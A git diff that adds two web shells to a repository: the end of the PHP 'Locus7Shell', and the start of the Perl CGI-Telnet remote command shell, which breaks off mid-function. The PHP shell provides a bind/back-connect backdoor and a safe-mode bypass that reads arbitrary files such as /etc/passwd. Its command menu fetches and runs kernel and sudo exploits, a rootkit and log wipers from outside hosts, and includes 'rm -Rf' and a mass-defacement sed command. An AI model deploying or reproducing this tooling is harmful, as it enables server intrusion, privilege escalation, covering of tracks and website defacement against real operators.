+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+);
+//For simple size- and speed-optimization.
+$imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+);
+if (!$getall)
+{
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+}
+else
+{
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+}
+exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
+if ($act == "backc")
+{
+$ip = $_SERVER["REMOTE_ADDR"];
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
+echo("$msg");
+echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+echo("</center>");
+} ?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">Useful Commands  
+    </div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+          <SELECT NAME="cmd">
+            <OPTION VALUE="uname -a">Kernel version
+              <OPTION VALUE="w">Logged in users
+                <OPTION VALUE="lastlog">Last to connect
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders?
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports
+                    <OPTION VALUE="locate gcc">gcc installed?
+                    <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
+                    <OPTION VALUE="./zap2">WIPELOGS PT3
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)
+                    <OPTION VALUE="wget http://precision-gaming.com/sudo.c">wget Linux sudo stack overflow
+                    <OPTION VALUE="gcc sudo.c -o sudosploit">Compile Linux sudo sploit
+                    <OPTION VALUE="./sudosploit">Execute Sudosploit
+                    <OPTION VALUE="wget http://twofaced.org/linux2-6-all.c">Linux Kernel 2.6.* rootkit.c
+                    <OPTION VALUE="gcc linux2-6-all.c -o linuxkernel">Compile Linux2-6-all.c
+                    <OPTION VALUE="./linuxkernel">Run Linux2-6-all.c
+                    <OPTION VALUE="wget http://twofaced.org/mig-logcleaner.c">Mig LogCleaner
+                    <OPTION VALUE="gcc -DLINUX -WALL mig-logcleaner.c -o migl">Compile Mig LogCleaner
+                    <OPTION VALUE="./migl -u root 0">Compile Mig LogCleaner
+                    <OPTION VALUE="sed -i -e 's/<html>/<div style=\'position\:absolute\;width\:2000px\;height\:2000px\;background-color\:black\'><br><br><br><br>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<img src=\'http://img80.imageshack.us/img80/6513/dcopyvx9.jpg\'><br><font size=\'10\' color=\'green\'>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<font size=\'10\' color=\'green\'>HACKED BY <a href=\'http\:\/\/ALTURKS.COM\'>LOCUS7S<\/a><\/font><\/div><meta http-equiv=\'refresh\' content=\'5\\;url=http\:\/\/ALTURKS.COM\'>/g' index.*">index.* Mass Defacement
+                  </SELECT>
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute">
+          <br>
+        Warning. Kernel may be alerted using higher levels </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
+      <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>">
+      <input type="hidden" name="client" value="firefox-a">
+      <input type="hidden" name="rls" value="org.mozilla:en-US:official">
+      <input type="hidden" name="hl" value="en">
+      <input type="hidden" name="hs" value="b7p">
+      <input type=submit name="btnG" VALUE="Search">
+    </form></center>
+    </td>
+</tr></TABLE><br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">Php Safe-Mode Bypass (Read Files)
+    </div><br>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+       
+       
+       
+            
+       
+       
+      <?
+       
+      function rsg_read()
+    {    
+    $test="";
+    $temp=tempnam($test, "cx");
+    $file=$_GET['file'];    
+    $get=htmlspecialchars($file);
+    echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+    if(copy("compress.zlib://".$file, $temp)){
+    $fichier = fopen($temp, "r");
+    $action = fread($fichier, filesize($temp));
+    fclose($fichier);
+    $source=htmlspecialchars($action);
+    echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+    unlink($temp);
+    } else {
+    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+    <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+    access.</CENTER></FONT>");
+            }
+    echo "</div>";
+    }
+     
+    if(isset($_GET['file']))
+{
+rsg_read();
+}
+     
+    ?>
+     
+    <?
+     
+    function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+    echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr>
+<td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+<td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Make Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>Make File<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Go Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>Go File<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ x2300 Locus7Shell v. <?php echo $shver; ?> <a href="http://www.ALTURKS.COM/"><u><b>Edited By</b></u></a> KingDefacer  | <a href="http://www.ALTURKS.COM">www.ALTURKS.COM</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c999shexit(); ?>
diff --git a/php/cgitelnet.php b/php/cgitelnet.php
new file mode 100644
index 0000000..405666e
--- /dev/null
+++ b/php/cgitelnet.php
@@ -0,0 +1,692 @@
+#!/usr/bin/perl
+#------------------------------------------------------------------------------
+# Copyright and Licence
+#------------------------------------------------------------------------------
+# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
+#
+# Copyright (C) 2001 Rohitab Batra
+# Permission is granted to use, distribute and modify this script so long
+# as this copyright notice is left intact. If you make changes to the script
+# please document them and inform me. If you would like any changes to be made
+# in this script, you can e-mail me.
+#
+# Author: Rohitab Batra
+# Author e-mail: rohitab@rohitab.com
+# Author Homepage: http://www.rohitab.com/
+# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
+# Product Support: http://www.rohitab.com/support/
+# Discussion Forum: http://www.rohitab.com/discuss/
+# Mailing List: http://www.rohitab.com/mlist/
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Installation
+#------------------------------------------------------------------------------
+# To install this script
+#
+# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
+#    your server. For most servers, you may not need to modify this.
+# 2. Change the password in the Configuration section below.
+# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
+#    Configuration Section below.
+# 4. Upload the script to a directory on your server which has permissions to
+#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
+#    the script in ASCII mode.
+# 5. Change the permission (CHMOD) of the script to 755.
+# 6. Open the script in your web browser. If you uploaded the script in
+#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
+# 7. Login using the password that you specified in Step 2.
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Configuration: You need to change only $Password and $WinNT. The other
+# values should work fine for most systems.
+#------------------------------------------------------------------------------
+$Password = "changeme";		# Change this. You will need to enter this
+				# to login.
+
+$WinNT = 0;			# You need to change the value of this to 1 if
+				# you're running this script on a Windows NT
+				# machine. If you're running it on Unix, you
+				# can leave the value as it is.
+
+$NTCmdSep = "&";		# This character is used to seperate 2 commands
+				# in a command line on Windows NT.
+
+$UnixCmdSep = ";";		# This character is used to seperate 2 commands
+				# in a command line on Unix.
+
+$CommandTimeoutDuration = 10;	# Time in seconds after commands will be killed
+				# Don't set this to a very large value. This is
+				# useful for commands that may hang or that
+				# take very long to execute, like "find /".
+				# This is valid only on Unix servers. It is
+				# ignored on NT Servers.
+
+$ShowDynamicOutput = 1;		# If this is 1, then data is sent to the
+				# browser as soon as it is output, otherwise
+				# it is buffered and send when the command
+				# completes. This is useful for commands like
+				# ping, so that you can see the output as it
+				# is being generated.
+
+# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
+
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
+$CmdPwd = ($WinNT ? "cd" : "pwd");
+$PathSep = ($WinNT ? "\\" : "/");
+$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
+
+#------------------------------------------------------------------------------
+# Reads the input sent by the browser and parses the input variables. It
+# parses GET, POST and multipart/form-data that is used for uploading files.
+# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
+# Other variables can be accessed using $in{'var'}, where var is the name of
+# the variable. Note: Most of the code in this function is taken from other CGI
+# scripts.
+#------------------------------------------------------------------------------
+sub ReadParse 
+{
+	local (*in) = @_ if @_;
+	local ($i, $loc, $key, $val);
+	
+	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
+
+	if($ENV{'REQUEST_METHOD'} eq "GET")
+	{
+		$in = $ENV{'QUERY_STRING'};
+	}
+	elsif($ENV{'REQUEST_METHOD'} eq "POST")
+	{
+		binmode(STDIN) if $MultipartFormData & $WinNT;
+		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
+	}
+
+	# handle file upload data
+	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
+	{
+		$Boundary = '--'.$1; # please refer to RFC1867 
+		@list = split(/$Boundary/, $in); 
+		$HeaderBody = $list[1];
+		$HeaderBody =~ /\r\n\r\n|\n\n/;
+		$Header = $`;
+		$Body = $';
+ 		$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
+		$in{'filedata'} = $Body;
+		$Header =~ /filename=\"(.+)\"/; 
+		$in{'f'} = $1; 
+		$in{'f'} =~ s/\"//g;
+		$in{'f'} =~ s/\s//g;
+
+		# parse trailer
+		for($i=2; $list[$i]; $i++)
+		{ 
+			$list[$i] =~ s/^.+name=$//;
+			$list[$i] =~ /\"(\w+)\"/;
+			$key = $1;
+			$val = $';
+			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} = $val; 
+		}
+	}
+	else # standard post data (url encoded, not multipart)
+	{
+		@in = split(/&/, $in);
+		foreach $i (0 .. $#in)
+		{
+			$in[$i] =~ s/\+/ /g;
+			($key, $val) = split(/=/, $in[$i], 2);
+			$key =~ s/%(..)/pack("c", hex($1))/ge;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} .= "\0" if (defined($in{$key}));
+			$in{$key} .= $val;
+		}
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML Page Header
+# Argument 1: Form item name to which focus should be set
+#------------------------------------------------------------------------------
+sub PrintPageHeader
+{
+	$EncodedCurrentDir = $CurrentDir;
+	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+	print "Content-type: text/html\n\n";
+	print <<END;
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
+<html>
+<head>
+<title>CGI-Telnet Version 1.0</title>
+$HtmlMetaHeader
+</head>
+<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
+<table border="1" width="100%" cellspacing="0" cellpadding="2">
+<tr>
+<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
+<b><font color="#000080" size="2">#</font></b></td>
+<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
+</tr>
+<tr>
+<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
+<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
+<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
+<a href="$ScriptLocation?a=logout">Disconnect</a> |
+<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
+</font></td>
+</tr>
+</table>
+<font color="#C0C0C0" size="3">
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the Login Screen
+#------------------------------------------------------------------------------
+sub PrintLoginScreen
+{
+	$Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
+/  __ \|  __ \|_   _|        |_   _|      | |             | |
+| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
+| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
+| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
+ \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
+                                         
+</font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2001, Rohitab Batra</font><font color="#FF0000">
+                   .-&quot;      &quot;-.
+                  /            \
+                 |              |
+                 |,  .-.  .-.  ,|
+                 | )(_o/  \o_)( |
+                 |/     /\     \|
+       (@_       (_     ^^     _)
+  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
+</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________&gt;</font><font color="#FF0000">
+        )_/        \          / 
+       (@           `--------`
+             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
+$;
+#'
+	print <<END;
+<code>
+Trying $ServerName...<br>
+Connected to $ServerName<br>
+Escape character is ^]
+<code>$Message
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the message that informs the user of a failed login
+#------------------------------------------------------------------------------
+sub PrintLoginFailedMessage
+{
+	print <<END;
+<code>
+<br>login: admin<br>
+password:<br>
+Login incorrect<br><br>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form for logging in
+#------------------------------------------------------------------------------
+sub PrintLoginForm
+{
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="login">
+login: admin<br>
+password:<input type="password" name="p">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the footer for the HTML Page
+#------------------------------------------------------------------------------
+sub PrintPageFooter
+{
+	print "</font></body></html>";
+}
+
+#------------------------------------------------------------------------------
+# Retreives the values of all cookies. The cookies can be accesses using the
+# variable $Cookies{''}
+#------------------------------------------------------------------------------
+sub GetCookies
+{
+	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
+	foreach $cookie(@httpcookies)
+	{
+		($id, $val) = split(/=/, $cookie);
+		$Cookies{$id} = $val;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the screen when the user logs out
+#------------------------------------------------------------------------------
+sub PrintLogoutScreen
+{
+	print "<code>Connection closed by foreign host.<br><br></code>";
+}
+
+#------------------------------------------------------------------------------
+# Logs out the user and allows the user to login again
+#------------------------------------------------------------------------------
+sub PerformLogout
+{
+	print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
+	&PrintPageHeader("p");
+	&PrintLogoutScreen;
+	&PrintLoginScreen;
+	&PrintLoginForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called to login the user. If the password matches, it
+# displays a page that allows the user to run commands. If the password doens't
+# match or if no password is entered, it displays a form that allows the user
+# to login
+#------------------------------------------------------------------------------
+sub PerformLogin 
+{
+	if($LoginPassword eq $Password) # password matched
+	{
+		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
+		&PrintPageHeader("c");
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # password didn't match
+	{
+		&PrintPageHeader("p");
+		&PrintLoginScreen;
+		if($LoginPassword ne "") # some password was entered
+		{
+			&PrintLoginFailedMessage;
+		}
+		&PrintLoginForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to enter commands
+#------------------------------------------------------------------------------
+sub PrintCommandLineInputForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="command">
+<input type="hidden" name="d" value="$CurrentDir">
+$Prompt
+<input type="text" name="c">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to download files
+#------------------------------------------------------------------------------
+sub PrintFileDownloadForm
+{
